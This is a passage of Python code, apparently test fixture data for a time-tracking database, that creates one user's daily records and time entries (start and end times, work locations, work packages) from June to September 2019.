, end = '15:30'
, work_location = '2'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '17:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:30'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '15:00'
, work_location = '2'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '16:00'
, end = '17:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '17:00'
, end = '18:00'
, work_location = '2'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '2'
, wp = '14'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '15:00'
, work_location = '2'
, wp = '12'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '14'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '10'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:30'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '10:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '10:00'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:15'
, work_location = '5'
, wp = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:15'
, work_location = '2'
, wp = '17'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:15'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '07:15'
, end = '07:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '18'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '17:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:30'
, work_location = '1'
, wp = '12'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:45'
, work_location = '1'
, wp = '19'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '14:45'
, end = '15:45'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '1'
, wp = '19'
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '11:30'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '11:30'
, end = '12:00'
, work_location = '1'
, wp = '19'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '10:15'
, work_location = '2'
, wp = '19'
)
db.time_record.create \
( daily_record = dr
, start = '10:15'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '18:00'
, work_location = '2'
, wp = '8'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '09:15'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '17:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '1'
)
db.time_record.create \
